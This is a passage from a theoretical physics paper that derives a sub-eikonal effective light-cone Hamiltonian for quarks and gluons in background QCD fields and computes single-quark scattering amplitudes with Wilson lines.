As we will explicitly demonstrate in the following, the background field boosted interaction term has the expansion \[\xi\widetilde{V}_{\rm I}(\tilde{z}^{+})=\widetilde{V}_{\rm I,(0)}(\tilde{z}^{+})+\xi^{\frac{1}{2}}\,\widetilde{V}_{\rm I,(\frac{1}{2})}(\tilde{z}^{+})+\xi\,\widetilde{V}_{\rm I,(1)}(\tilde{z}^{+})+\ldots \tag{19}\] Denoting the leading eikonal interaction operator as \[\hat{W}(\tilde{x}^{+},\tilde{x}_{0}^{+})={\cal P}\mbox{exp}\left\{-i\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{z}^{+}\widetilde{V}_{\rm I,(0)}(\tilde{z}^{+})\right\}, \tag{20}\] one can then expand the \(S\)-matrix operator up to first order in \(\xi\) from eqs. (17) and (19) \[\begin{split}&\hat{S}(\tilde{x}^{+},\tilde{x}_{0}^{+})=\mathcal{P}\text{exp}\left\{-i\xi\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{z}^{+}\widetilde{V}_{\text{I}}(\tilde{z}^{+})\right\}\\ =&\hat{W}(\tilde{x}^{+},\tilde{x}_{0}^{+})-i\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{w}^{+}\hat{W}(\tilde{x}^{+},\tilde{w}^{+})\Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{2})}(\tilde{w}^{+})+\xi\widetilde{V}_{\text{I},(1)}(\tilde{w}^{+})\Big{]}\hat{W}(\tilde{w}^{+},\tilde{x}_{0}^{+})\\ &-\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{w}_{2}^{+}\int_{\tilde{x}_{0}^{+}}^{\tilde{w}_{2}^{+}}d\tilde{w}_{1}^{+}\hat{W}(\tilde{x}^{+},\tilde{w}_{2}^{+})\Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{2})}(\tilde{w}_{2}^{+})\Big{]}\hat{W}(\tilde{w}_{2}^{+},\tilde{w}_{1}^{+})\Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{2})}(\tilde{w}_{1}^{+})\Big{]}\hat{W}(\tilde{w}_{1}^{+},\tilde{x}_{0}^{+})\\ &+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{21}\] Eq. (21) is the main result of this section. It is the starting point for calculating various scattering amplitudes up to next-to-eikonal order. It should be pointed out that the Wilson line operator in eq. (20) contains sub-eikonal contributions due to the transformation to the interaction picture given in eq. (18); see the detailed discussion in appendix C, where these sub-eikonal contributions are equivalently absorbed into \(V_{(1)}\). In the following section, the expressions of \(V_{(0)},V_{(\frac{1}{2})},V_{(1)}\) are derived.

### Effective light-cone Hamiltonian up to sub-eikonal order

The transformations of quark and gluon fields under a Lorentz boost are (see appendix A and also [19; 20]) \[\begin{split}& a^{-}\longrightarrow\widetilde{a}^{-}=e^{\omega}\,a^{-}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ & a^{i}\longrightarrow\widetilde{a}^{i}=a^{i}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ &\psi_{G}\longrightarrow\widetilde{\psi}_{G}=e^{-\omega/2}\psi_{G}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ &\psi_{B}\longrightarrow\widetilde{\psi}_{B}=e^{\omega/2}\psi_{B}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}).\end{split} \tag{22}\] The field strength tensor transforms as \[\begin{split}& f^{+i}\longrightarrow\widetilde{f}^{+i}=e^{-\omega}f^{+i}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ & f^{ij}\longrightarrow\widetilde{f}^{ij}=f^{ij}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}).\end{split} \tag{23}\] We study the interaction with the background fields given in eq. (11) and examine how it transforms under the transformations (22) and (23). We will perform a power series expansion in \(\xi=e^{-\omega}\) and keep terms up to zeroth order in \(\xi\). Note that there is already a factor of \(\xi\) in the exponential of eq. (17).
Before analyzing each term, we first look at the factors involving inverse derivative and see how they transform by boosting the background fields. \[\begin{split}&\left[\frac{1}{\partial_{-}}J^{+}_{\text{int}}\right]^ {a}(x^{-})=\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x^{-}-z^{-})J^{+}_{ \text{int}}(z^{-})\\ =&\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x^ {-}-z^{-})\left(-2ig[f^{+i},A_{i}]+g\sqrt{2}\Psi^{\dagger}_{G}t^{c}\psi_{G}+g \sqrt{2}\psi^{\dagger}_{G}t^{c}\Psi_{G}\right)\\ \Longrightarrow&\frac{1}{2}\int_{-\infty}^{\infty}dz^{ -}\epsilon(x^{-}-z^{-})\Big{[}e^{-\omega}\Big{(}-2ig[f^{+i}(\tilde{x}^{+}, \tilde{z}^{-}),A_{i}]\Big{)}\\ &\qquad+e^{-\omega/2}\Big{(}\sqrt{2}\Psi^{\dagger}_{G}t^{c}\psi_ {G}(\tilde{x}^{+},\tilde{z}^{-})+\sqrt{2}\psi^{\dagger}_{G}(\tilde{x}^{+}, \tilde{z}^{-})t^{c}\Psi_{G}\Big{)}\Big{]}\end{split} \tag{24}\] Here \(\tilde{x}^{+}=e^{\omega}x^{+}\) and \(\tilde{z}^{-}=e^{-\omega}z^{-}\). We use long right arrow to indicate expressions after boosting the background fields. Terms containing this factor eq. (24) do not contribute to interactions at sub-eikonal order as they are high powers in \(\xi\). As a result, the second and the third terms in eq. (11) will not contribute at the sub-eikonal order except the term \(ig[a_{i},A^{i}]\frac{1}{\partial_{-}}J^{+}_{0}\). The other factor containing inverse derivative is, \[\begin{split}&\frac{1}{\partial_{-}}\gamma^{+}(g\gamma^{i}a_{i} \Psi_{G}+g\gamma^{i}A_{i}\psi_{G})=\frac{1}{2}\int_{-\infty}^{\infty}dz^{-} \epsilon(x^{-}-z^{-})\gamma^{+}(g\gamma^{i}a_{i}\Psi_{G}+g\gamma^{i}A_{i} \psi_{G})\\ \Longrightarrow&\frac{1}{2}\int_{-\infty}^{\infty}dz^ {-}\epsilon(x^{-}-z^{-})\Big{(}g\gamma^{+}\gamma^{i}a_{i}(\tilde{x}^{+}, \tilde{z}^{-})\Psi_{G}+e^{-\omega/2}g\gamma^{+}\gamma^{i}A_{i}\psi_{G}(\tilde {x}^{+},\tilde{z}^{-})\Big{)}\\ =&\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x ^{-}-z^{-})\Big{(}g\gamma^{+}\gamma^{i}a_{i}(\tilde{x}^{+},\tilde{z}^{-}) \Psi_{G}\Big{)}+\mathcal{O}(\xi^{\frac{1}{2}}).\end{split} \tag{25}\] In the last equality, we only kept the term contributing to interaction at the sub-eikonal order in the end. We analyze the terms in eq. (11). For notational simplicity, we suppress the transverse coordinates, which are not relevant to the analysis of eikonality expansion. The first two lines in eq. (11) \[\begin{split}&\int dx^{+}dx^{-}\left(-\frac{1}{2}A^{i}_{a}\Big{(}( \mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij}+2ig(f_{ij} )^{ac}\Big{)}A^{j}_{c}+iga^{i}_{b}\big{(}ig[A^{j},[A_{i},A_{j}]]_{b}+[A_{i}, \frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\right)\\ \Longrightarrow&\int dx^{+}dx^{-}\Big{(}-\frac{1}{2}A^{i}_ {a}\Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij} +2ig(f_{ij})^{ac}\Big{)}(\tilde{x}^{+},e^{-\omega}x^{-})A^{j}_{c}\\ &\qquad+iga^{i}_{b}(\tilde{x}^{+},e^{-\omega}x^{-})\big{(}ig[A^{ j},[A_{i},A_{j}]]_{b}+[A_{i},\frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\Big{)}\\ =&\xi\int d\tilde{x}^{+}dx^{-}\Big{(}-\frac{1}{2}A^{i}_ {a}\Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij} +2ig(f_{ij})^{ac}\Big{)}A^{j}_{c}\\ &\qquad+iga^{i}_{b}\big{(}ig[A^{j},[A_{i},A_{j}]]_{b}+[A_{i}, \frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\Big{)}+\mathcal{O}(\xi^{2})\end{split} \tag{26}\] In the last line, we expanded the expression in powers of \(\xi\) and only kept the leading order terms. 
The dynamical gluon fields have arguments \(A_{i}\equiv A_{i}(0,x^{-})\) while for the background fields \(a_{i}\equiv a_{i}(\tilde{x}^{+},0)\). The usual eikonal interaction term is obtained from the last term in the second line of eq. (11) \[\begin{split}&\int dx^{+}dx^{-}a^{-}(x^{+},x^{-})J_{0}^{+}(x^{+},x^{-})\Longrightarrow\int dx^{+}dx^{-}e^{\omega}a^{-}(\tilde{x}^{+},\tilde{x}^{-})J_{0}^{+}(x^{+},x^{-})\\ =&\int d\tilde{x}^{+}a^{-}(\tilde{x}^{+},0)\int dx^{-}J_{0}^{+}(0,x^{-})+\xi\int d\tilde{x}^{+}\partial_{-}a^{-}(\tilde{x}^{+},0)\int dx^{-}x^{-}J_{0}^{+}(0,x^{-})\\ &+\xi\int d\tilde{x}^{+}\tilde{x}^{+}a^{-}(\tilde{x}^{+},0)\int dx^{-}\partial_{+}J_{0}^{+}(0,x^{-})+\mathcal{O}(\xi^{2}).\end{split} \tag{27}\] In the last equality, we have performed a Taylor expansion in powers of \(\xi\). The first term is the well-known eikonal interaction. The other two terms are sub-eikonal interactions containing derivatives of the background fields and of the dynamical fields. The second term characterizes longitudinal momentum exchange between the projectile and the shockwave (see appendix C for its contribution to the single particle scattering amplitude). Such a process does not interfere with the eikonal order amplitude, which, on the other hand, preserves the longitudinal momentum of the projectile. The third term represents sub-eikonal contributions that are equivalently included through the sub-eikonal order Wilson line operator transformations demonstrated in appendix C. We therefore ignore these two terms in the following discussions. The three instantaneous terms involving fermion fields in eq. (11) can be combined together. The first one is transformed by \[\begin{split}&\int dx^{+}dx^{-}\Big{(}-\frac{g}{\sqrt{2}}(\Psi_{G}^{\dagger}\gamma^{i}a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i})\gamma^{-}\Phi_{B}\Big{)}\\ \Longrightarrow&-\frac{g}{\sqrt{2}}\int dx^{+}dx^{-}\Big{(}\Psi_{G}^{\dagger}\gamma^{i}a_{i}(\tilde{x}^{+},e^{-\omega}x^{-})+e^{-\omega/2}\psi_{G}^{\dagger}(\tilde{x}^{+},e^{-\omega}x^{-})\gamma^{i}A_{i}\Big{)}\gamma^{-}\Phi_{B}(x^{+},x^{-})\\ =&-\xi\frac{g}{\sqrt{2}}\int d\tilde{x}^{+}a_{i}^{b}(\tilde{x}^{+},0)\int dx^{-}\Psi_{G}^{\dagger}\gamma^{i}t^{b}\gamma^{-}\Phi_{B}(0,x^{-})+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{28}\] In the last equality, we have dropped the term containing \(e^{-\omega/2}\), which contributes at order \(\xi^{\frac{3}{2}}\). The next term is transformed as \[\begin{split}&-\frac{g}{\sqrt{2}}\int dx^{+}dx^{-}\partial_{-}\Phi_{B}^{\dagger}\frac{1}{\partial_{-}}\gamma^{+}(\gamma^{i}a_{i}\Psi_{G}+\gamma^{i}A_{i}\psi_{G})\\ \Longrightarrow&-\xi\frac{g}{\sqrt{2}}\int d\tilde{x}^{+}a_{j}^{b}(\tilde{x}^{+},0)\int dx^{-}\partial_{-}\Phi_{B}^{\dagger}(0,x^{-})\gamma^{+}\gamma^{j}t^{b}\frac{1}{\partial_{-}}\Psi_{G}(0,x^{-})+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{29}\] Similarly, the third term transforms as \[\begin{split}&\int dx^{+}dx^{-}\frac{ig^{2}}{\sqrt{2}}(\Psi_{G}^{\dagger}\gamma^{i}a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i})\frac{1}{\partial_{-}}(g\gamma^{i}a_{i}\Psi_{G}+\gamma^{i}A_{i}\psi_{G})\\ \Longrightarrow&\xi\frac{ig^{2}}{\sqrt{2}}\int d\tilde{x}^{+}a_{j}^{b}(\tilde{x}^{+},0)a_{i}^{c}(\tilde{x}^{+},0)\int dx^{-}\Psi_{G}^{\dagger}\gamma^{j}\gamma^{i}t^{b}t^{c}\frac{1}{\partial_{-}}\Psi_{G}+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{30}\] We now need to combine the three expressions in eqs. (28), (29) and (30). Keep in mind that these terms are accompanied by their complex conjugate parts.
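Before combining these expressions, it may help to recapitulate the power counting implicit in eqs. (22)-(28) (a bookkeeping summary, not an additional result): each background field carries the boost weight assigned in eqs. (22)-(23), and one overall factor of \(\xi\) arises from the light-cone time measure, \(dx^{+}=\xi\,d\tilde{x}^{+}\),
\[a^{-}\sim\xi^{-1},\qquad a^{i},\,f_{ij}\sim\xi^{0},\qquad \psi_{B}\sim\xi^{-1/2},\qquad f^{+i}\sim\xi^{1},\]
so that the \(a^{-}J^{+}\) coupling enters at order \(\xi^{0}\) (eikonal), insertions of the background \(\psi_{B}\) at order \(\xi^{\frac{1}{2}}\), insertions of \(a_{i}\) or \(f_{ij}\) at order \(\xi\), and terms containing \(f^{+i}\) only beyond sub-eikonal accuracy.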
We express the product of Dirac gamma matrices as \[\gamma^{i}\gamma^{j} =\frac{1}{2}\Big{(}[\gamma^{i},\gamma^{j}]+\{\gamma^{i},\gamma^{j}\}\Big{)}=-2iS^{ij}-\delta^{ij}, \tag{31}\] \[\gamma^{j}\gamma^{i} =\frac{1}{2}\Big{(}-[\gamma^{i},\gamma^{j}]+\{\gamma^{i},\gamma^{j}\}\Big{)}=2iS^{ij}-\delta^{ij}.\] We have used the generators for Lorentz transformations in spinor space, \(S^{\mu\nu}=\frac{i}{4}[\gamma^{\mu},\gamma^{\nu}]\). In combining the three expressions, the terms that are quadratic in the fermion field are \[\xi\frac{i}{\sqrt{2}}\int d\tilde{x}^{+}dx^{-}d^{2}\mathbf{x}\Big{(}a^{b}_{i}(-ig\Psi^{\dagger}_{G}\gamma^{i}\gamma^{j}t^{b}\frac{1}{\partial_{-}}\partial_{j}\Psi_{G}+ig\partial_{j}\Psi^{\dagger}_{G}\gamma^{j}\gamma^{i}t^{b}\frac{1}{\partial_{-}}\Psi_{G})+a^{b}_{j}a^{c}_{i}g^{2}\Psi^{\dagger}_{G}\gamma^{j}\gamma^{i}t^{b}t^{c}\frac{1}{\partial_{-}}\Psi_{G}\Big{)} \tag{32}\] \[= \xi\frac{i}{\sqrt{2}}\int d\tilde{x}^{+}dx^{-}d^{2}\mathbf{x}\Psi^{\dagger}_{G}\Big{(}gf_{ji}S^{ij}-(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})\Big{)}\frac{1}{\partial_{-}}\Psi_{G}\] We have used the identity \(f^{d}_{ji}=\partial_{j}a^{d}_{i}-\partial_{i}a^{d}_{j}+ig(if^{bcd}t^{d}a^{b}_{j}a^{c}_{i})\) and that \[\mathcal{D}_{l}\mathcal{D}^{l}\Psi=\partial_{l}\partial^{l}\Psi+ig\partial_{l}a^{l}\Psi+2iga^{l}\partial_{l}\Psi+(ig)^{2}a_{l}a^{l}\Psi. \tag{33}\] Integration by parts for the transverse spatial derivatives is used throughout the derivations. In eqs. (28) and (29), terms that contain the fermion mass cancel. In combining the three expressions, the quark-antiquark-gluon interaction vertex is \[\xi\frac{i}{\sqrt{2}}g^{2}\int d^{2}\mathbf{x}d\tilde{x}^{+}a^{b}_{i}\int dx^{-}\Big{(}\Psi^{\dagger}_{G}t^{b}\gamma^{i}\frac{1}{\partial_{-}}(\gamma^{j}A_{j}\Psi_{G})+\Psi^{\dagger}_{G}A_{j}\gamma^{j}\frac{1}{\partial_{-}}(\gamma^{i}t^{b}\Psi_{G})\Big{)} \tag{34}\] \[= \xi\frac{i}{\sqrt{2}}g^{2}\int d^{2}\mathbf{x}d\tilde{x}^{+}dx^{-}a^{b}_{i}A^{c}_{j}\Psi^{\dagger}_{G}\gamma^{j}\gamma^{i}t^{c}t^{b}\frac{1}{\partial_{-}}\Psi_{G}+h.c.\] Note that integration by parts is used and the boundary term \(\int dx^{-}\partial_{-}(\frac{1}{\partial_{-}}\Psi^{\dagger}_{G}t^{b}\gamma^{i}\frac{1}{\partial_{-}}(\gamma^{j}A_{j}\Psi_{G}))\) is ignored. The last two terms in eq. (11) are transformed as \[\int dx^{+}dx^{-}\Big{(}g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B}\gamma^{i}A_{i}\Psi_{G}\Big{)} \tag{35}\] \[\Longrightarrow \int dx^{+}dx^{-}e^{\omega/2}\Big{(}g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}(\tilde{x}^{+},e^{-\omega}x^{-})+g\bar{\psi}_{B}(\tilde{x}^{+},e^{-\omega}x^{-})\gamma^{i}A_{i}\Psi_{G}\Big{)}\] \[= \xi^{1/2}\int d\tilde{x}^{+}dx^{-}\Big{(}g\bar{\Psi}_{G}(0,x^{-})\gamma^{i}A_{i}(0,x^{-})\psi_{B}(\tilde{x}^{+},0)+g\bar{\psi}_{B}(\tilde{x}^{+},0)\gamma^{i}A_{i}(0,x^{-})\Psi_{G}(0,x^{-})\Big{)}+\mathcal{O}(\xi^{\frac{3}{2}})\] These two terms have power \(\xi^{1/2}\); they describe the conversion between quarks and gluons induced by the background fermion fields. Let us summarize the main results of this section. The eikonal interaction is \[V_{(0)}=a^{-}_{b}J^{+}_{b}= a^{-}_{b}\Big{(}g\bar{\Psi}\gamma^{+}t^{b}\Psi-ig[A^{i},F^{+i}]^{b}\Big{)}. \tag{36}\] The order-\(\xi^{\frac{1}{2}}\) sub-eikonal interaction, shown in Fig. 1, is \[V_{(\frac{1}{2})}= g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B}\gamma^{i}A_{i}\Psi_{G}. \tag{37}\] It should be noted that only the bad component \(\psi_{B}\) of the background fermion field is responsible for this sub-eikonal interaction. The order-\(\xi\) sub-eikonal interaction due to the background gluon and quark fields has the expression \[\begin{split} V_{(1)}=&-\frac{1}{2}A_{a}^{i}\Big{(}(\mathcal{D}_{l}\mathcal{D}^{l})^{ab}g_{ij}+2ig(f_{ij})^{ab}\Big{)}A_{b}^{j}+\frac{i}{\sqrt{2}}\Psi_{G}^{\dagger}\Big{(}gf_{ji}S^{ij}-\mathcal{D}_{l}\mathcal{D}^{l}\Big{)}\frac{1}{\partial_{-}}\Psi_{G}\\ &+ig\left[A_{i},A_{j}\right]_{b}(\mathcal{D}^{i}A^{j})_{b}+(\mathcal{D}_{i}A^{i})_{b}\frac{1}{\partial_{-}}\left(-ig\left[\partial_{-}A^{j},A_{j}\right]+\sqrt{2}g\Psi_{G}^{\dagger}t^{b}\Psi_{G}\right)\\ &+\frac{1}{\sqrt{2}}g\Psi_{G}^{\dagger}A_{j}\gamma^{j}\gamma^{i}\mathcal{D}_{i}\frac{1}{\partial_{-}}\Psi_{G}+h.c.\end{split} \tag{38}\] It is interesting to note that at the sub-eikonal level, the triple vertices, either three-gluon or quark-antiquark-gluon vertices, are induced only by the background transverse gluon fields; see Fig. 2. In eq. (38), we have combined these background field induced triple interaction vertices with the corresponding vacuum triple interaction terms that contain ordinary spatial partial derivatives (given in eq. (9)). These combinations lead to interaction terms that depend on the covariant derivative \(\mathcal{D}_{i}\) rather than simply on the background gauge potential \(a_{i}\). When computing physical observables, gauge covariance becomes apparent with the help of these combinations. For the terms quadratic in the dynamical fields in eq. (38), we have also included the vacuum terms \(-\frac{1}{2}A^{i}\partial_{l}\partial^{l}A^{i}\) and \(-\frac{i}{\sqrt{2}}\Psi_{G}^{\dagger}\partial_{l}\partial^{l}\frac{1}{\partial_{-}}\Psi_{G}\). These terms describe the sub-eikonal order of the free vacuum propagator, even though they are independent of the background fields.

Figure 1: The order-\(\xi^{\frac{1}{2}}\) sub-eikonal interaction representing background (anti)quark field induced conversion between quark and gluon.

Figure 2: The order-\(\xi\) sub-eikonal interaction representing background gluon field induced triple field vertices.

In appendix C, it is shown that these terms are indeed sub-eikonal, as they come from the sub-eikonal order Wilson line operator transformation. More explanation will be given in the following section when computing the single particle scattering amplitude. The upshot is that the dependence on the background gluon field \(a_{i}\) is either through \(f_{ij}\) or through \(\mathcal{D}_{i}\), maintaining explicit gauge covariance. The effective interaction is expressed purely in terms of the independent dynamical fields \(A^{i},\Psi_{G}\). In the following, we will quantize the theory by substituting the mode expansions of these fields, eq. (14); see appendix B for details. The quadratic terms provide the effective propagators for the gluon and the quark. The triple interaction terms represent background-field-induced three-field interactions.

## 3 Single Particle Scattering Amplitude

In this section, we calculate the various scattering amplitudes up to sub-eikonal order for a single (anti)quark or gluon propagating through the background fields. The formula in eq. (21) is our starting point.
Since the tilded coordinates in eq. (21) are dummy variables and we have already performed the Lorentz boost on the background fields to obtain the interaction terms up to sub-eikonal order, we ignore the tilde on all symbols in the following discussion for notational simplicity.

### Single (anti)quark scattering amplitude

The scattering amplitude for a single quark propagating through the background fields is \[\langle q|\hat{S}|q\rangle\equiv M^{q\to q}(\{p^{\prime+},\mathbf{x}^{\prime},m^{\prime},\sigma^{\prime}\};\{p^{+},\mathbf{x},m,\sigma\})=\big{<}0\big{|}\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},\mathbf{x}^{\prime})\,\hat{S}\,\hat{b}_{m,\sigma}^{\dagger}(p^{+},\mathbf{x})\big{|}0\big{>} \tag{15}\] The incoming quark has color index \(m\) and spin index \(\sigma\), longitudinal momentum \(p^{+}\) and transverse coordinate \(\mathbf{x}\). The corresponding primed quantities characterize the outgoing quark. Here \(\hat{b}^{\dagger}\) is the quark creation operator. Substituting eq. (21) into eq. (15), there are three terms in the eikonality expansion of \(\hat{S}\) that contribute up to sub-eikonal order. The first term is the eikonal interaction with the background fields \[\begin{split}&\big{<}0\big{|}\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},\mathbf{x}^{\prime})\,\hat{W}(x^{+},x_{0}^{+})\,\hat{b}_{m,\sigma}^{\dagger}(p^{+},\mathbf{x})\big{|}0\big{>}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta(\mathbf{x}-\mathbf{x}^{\prime})\delta_{\sigma\sigma^{\prime}}V_{\mathbf{x}}^{m^{\prime}m}(x^{+},x_{0}^{+})\end{split} \tag{16}\] As expected, this is just the eikonal Wilson line in the fundamental representation for a quark \[V_{\mathbf{x}}(x^{+},x_{0}^{+})=\mathcal{P}\mathrm{exp}\left\{-ig\int_{x_{0}^{+}}^{x^{+}}dz^{+}a_{b}^{-}(z^{+},\mathbf{x})t^{b}\right\}. \tag{17}\] We have used the transformations \(\hat{W}^{\dagger}\hat{b}_{j}\hat{W}=V_{ji}\hat{b}_{i}\) and \(\hat{W}\hat{b}_{j}^{\dagger}\hat{W}^{\dagger}=\hat{b}_{i}^{\dagger}V_{ij}\), valid at eikonal order; see appendix C for details. From eq. (21), the second contributing term is sub-eikonal \[-i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,\langle 0|\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf x}^{\prime})\hat{W}(x^{+},w^{+})V_{(1),\rm I}(w^{+})\hat{W}(w^{+},x_{0}^{+})\hat{b}^{\dagger}_{m,\sigma}(p^{+},{\bf x})|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{{\bf x}^{\prime}}^{m^{\prime}n^{\prime}}(x^{+},w^{+})\langle 0|\hat{b}_{n^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf x}^{\prime})V_{(1),\rm I}(w^{+})\hat{b}^{\dagger}_{n,\sigma}(p^{+},{\bf x})|0\rangle V_{\bf x}^{nm}(w^{+},x_{0}^{+})\] \[= i\xi(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{\sigma\sigma^{\prime}}\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{{\bf x}^{\prime}}^{m^{\prime}n^{\prime}}(x^{+},w^{+})\int_{\bf z}\delta({\bf x}^{\prime}-{\bf z})\] \[\quad\times\Big{[}-(2\sigma)gf_{12}(w^{+},{\bf z})+\overleftarrow{\mathcal{D}}_{l}\,\overrightarrow{\mathcal{D}}^{l}(w^{+},{\bf z})\Big{]}^{n^{\prime}n}\,\delta({\bf x}-{\bf z})V_{\bf x}^{nm}(w^{+},x_{0}^{+})\] We have substituted the portion of \(V_{(1)}\) that is quadratic in quark fields from eq. (38), together with the mode expansion for the quark field given in eq. (31). The transformation to the interaction picture introduces higher order contributions in eikonality, so it is safe to set \(V_{(1),\rm I}=V_{(1)}\) in the above calculations.
From eq. (21), the third term contributing to the quark scattering amplitude is \[-\xi\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}\langle 0|\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf x}^{\prime})\hat{W}(x^{+},w_{2}^{+})V_{(\frac{1}{2}),\rm I}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\] \[\quad\quad\quad\quad\times V_{(\frac{1}{2}),\rm I}(w_{1}^{+})\hat{W}(w_{1}^{+},x_{0}^{+})\hat{b}^{\dagger}_{m,\sigma}(p^{+},{\bf x})\big{|}0\rangle\] \[= -\xi\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{{\bf x}^{\prime}}^{m^{\prime}n^{\prime}}(x^{+},w_{2}^{+})\big{\langle}0|\hat{b}_{n^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf y}_{\perp})V_{(\frac{1}{2}),\rm I}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\] \[\quad\quad\quad\quad\times V_{(\frac{1}{2}),\rm I}(w_{1}^{+})\hat{b}^{\dagger}_{n,\sigma}(p^{+},{\bf x}_{\perp})\big{|}0\rangle V_{\bf x}^{nm}(w_{1}^{+},x_{0}^{+})\] \[= -\xi\frac{1}{2}g^{2}(2\pi)\delta(p^{+}-p^{\prime+})\delta({\bf x}-{\bf x}^{\prime})\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{{\bf x}}^{m^{\prime}n^{\prime}}(x^{+},w_{2}^{+})t^{e^{\prime}}_{n^{\prime}l^{\prime}}\psi^{\beta}_{B,l^{\prime}}(w_{2}^{+},{\bf x})\] \[\quad\quad\quad\times\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2\sigma\gamma^{-}\gamma^{5}]^{\alpha\beta}U_{{\bf x}}^{e^{\prime}e}(w_{2}^{+},w_{1}^{+})\bar{\psi}^{\alpha}_{B,l}(w_{1}^{+},{\bf x}_{\perp})t^{e}_{ln}V_{{\bf x}}^{nm}(w_{1}^{+},x_{0}^{+}). \tag{35}\] We have substituted the expression of \(V_{(\frac{1}{2})}\) from eq. (37), together with the mode expansions for the quark and gluon fields from eq. (31). We have used the identity \(\sum_{\lambda}\varepsilon_{\lambda}^{i*}\varepsilon_{\lambda}^{i^{\prime}}=\delta^{ii^{\prime}}\) and the eikonal transformation on the gluon creation operator, \(\hat{W}\hat{a}_{e}^{\dagger}\hat{W}^{\dagger}=\hat{a}_{h}^{\dagger}U^{he}\). The spinor space matrix identity (here \(\alpha,\beta\) are indices in the spinor space, with \(\alpha\) the column index and \(\beta\) the row index) \[\Big{[}\gamma_{i}u_{G,\sigma}(p^{+})\Big{]}^{\alpha}\Big{[}\bar{u}_{G,\sigma^{\prime}}(p^{+})\gamma_{i}\Big{]}^{\beta}=p^{+}\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2\sigma\gamma^{-}\gamma^{5}]^{\alpha\beta} \tag{36}\] is also needed. Putting together the three terms from eqs. (2), (3.4) and (3.5), the single quark scattering amplitude up to sub-eikonal order is \[M^{q\to q}(\{p^{\prime+},{\bf x}^{\prime},m^{\prime},\sigma^{\prime}\};\{p^{+},{\bf x},m,\sigma\})\] \[= (2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{\sigma\sigma^{\prime}}\Big{[}\delta({\bf x}-{\bf x}^{\prime})V_{{\bf x}}^{m^{\prime}m}+\xi\delta({\bf x}-{\bf x}^{\prime})2\sigma\,V_{{\bf x}}^{\rm pol[1]}(p^{+})+\xi V_{{\bf x}^{\prime},{\bf x}}^{\rm pol[2]}(p^{+})\Big{]} \tag{37}\] The polarized Wilson lines of type one, \(V_{\mathbf{x}}^{\text{pol[1]}}(p^{+})\), can be decomposed as \(V_{\mathbf{x}}^{\text{pol[1]}}(p^{+})=V_{\mathbf{x}}^{\text{q[1]}}(p^{+})+V_{\mathbf{x}}^{\text{G[1]}}(p^{+})\), indicating whether the dependence is on the background quark field or on the background gluon field.
